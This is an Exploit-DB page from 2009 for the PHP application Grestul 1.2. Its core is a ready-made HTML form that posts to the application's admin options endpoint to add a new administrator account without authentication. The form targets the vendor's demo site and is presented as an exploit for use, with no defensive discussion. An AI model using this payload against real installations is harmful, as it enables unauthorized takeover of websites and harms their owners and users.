Grestul 1.2 - Remote Add Administrator Account

EDB-ID:

8902




Platform:

PHP

Date:

2009-06-08


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Grestul 1.2 Remote add admin exploit
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://grestul.com/
Note: Algerie 3-1 Egypt

code
-----
<form method="post" name="add_admin" id="add_admin" action="http://grestul.com/demo/admin/options.php?action=manage_admin">
  <label for="username_new" class="label_newpage">Username:</label><br /><input type="text" name="username_new" id="username_new" class="input_newpage" value="" />
  <br /><br /><label for="password" class="label_newpage">New Password:</label><br /><input type="password" name="password" id="password" class="input_newpage" value="" />
  <br /><br /><label for="con_password" class="label_newpage">Confirm Password:</label><br /><input type="password" name="con_password" id="con_password" class="input_newpage" value="" />
  <br /><input type="submit" name="add_admin" id="add_admin" value="Add Admin" class="submit_newpage" />
  </form></div>
---------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-08]